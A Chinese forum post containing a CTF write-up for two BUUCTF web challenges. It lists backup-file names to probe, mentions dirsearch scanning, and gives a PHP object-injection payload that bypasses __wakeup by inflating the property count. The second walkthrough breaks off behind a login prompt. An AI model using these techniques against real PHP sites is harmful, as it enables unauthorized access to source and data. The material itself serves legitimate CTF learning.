论坛
潜水/灌水快乐,沉淀知识,认识更多同行。
ToB圈子
加入IT圈,遇到更多同好之人。
朋友圈
看朋友圈动态,了解ToB世界。
ToB门户
了解全球最新的ToB事件
博客
Blog
排行榜
Ranklist
文库
业界最专业的IT文库,上传资料也可以赚钱
下载
分享
Share
导读
Guide
相册
Album
记录
Doing
搜索
本版
文章
帖子
ToB圈子
用户
免费入驻
产品入驻
解决方案入驻
公司入驻
案例入驻
登录
·
注册
只需一步,快速开始
账号登录
立即注册
找回密码
用户名
Email
自动登录
找回密码
密码
登录
立即注册
首页
找靠谱产品
找解决方案
找靠谱公司
找案例
找对的人
专家智库
悬赏任务
圈子
SAAS
IT评测·应用市场-qidao123.com
»
论坛
›
安全
›
网络安全
›
BUUCTF-Web方向16-20wp
BUUCTF-Web方向16-20wp
缠丝猫
金牌会员
|
2025-2-22 00:01:55
|
显示全部楼层
|
阅读模式
楼主
主题
969
|
帖子
969
|
积分
2907
[极客大寻衅 2019]PHP
由内容提示应该存在源码备份,常见的如下,一个个尝试
后缀:tar tar.gz zip rar
名字:www web website backup back wwwroot temp
复制代码
访问www.zip,下载下来
解压查看
index.php
flag.php
class.php
[/code]结果如下
[code]<?php
class Name{
private $username = 'admin';
private $password = 100;
}
$A=new Name();
echo serialize($A);
?>
复制代码
这里需要绕过
__wakeup
函数,而__wakeup函数存在一个特性,当成员属性数量大于实际数量时才可绕过wakeup
由于序列化的存在空字符,故需要
%00
来代替,即空字符的
url编码
O:4:"Name":2:{s:14:" Name username";s:5:"admin";s:14:" Name password";i:100;}
复制代码
拿到flag
[ACTF2020 新生赛]BackupFile
题目提示备份文件
后缀:tar tar.gz zip rar
名字:www web website backup back wwwroot temp
复制代码
除了以上这些,还有
.bak/.swp/.old
,都可以试试
这里使用dirsearch扫出来
index.php.bak
文件,下载下来
使用记事本打开
[code]
本帖子中包含更多资源
您需要
登录
才可以下载或查看,没有账号?
立即注册
x
回复
使用道具
举报
0 个回复
倒序浏览
返回列表
快速回复
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
or
立即注册
本版积分规则
发表回复
回帖并转播
回帖后跳转到最后一页
发新帖
回复
缠丝猫
金牌会员
这个人很懒什么都没写!
楼主热帖
【设置ssh免密不起作用?彻底搞懂密钥 ...
关于Servlet的补充知识
kubernetes之镜像拉取策略ImagePullSec ...
MySQL 8.0 新特性梳理汇总
【云原生】Docker 进阶 -- 构建自定义 ...
java如何编写增强for循环呢? ...
基于C#+unity的2D跑酷闯关对战冒险游戏 ...
在chatGPT的帮助下成功从Rancher中删除 ...
超融合技术入门:怎样轻松把握这一技术 ...
常见开发模型-敏捷开发与瀑布开发模型 ...
标签云
运维
CIO
存储
服务器
浏览过的版块
linux
.Net
数据安全
开源技术
主机安全
运维.售后
快速回复
返回顶部
返回列表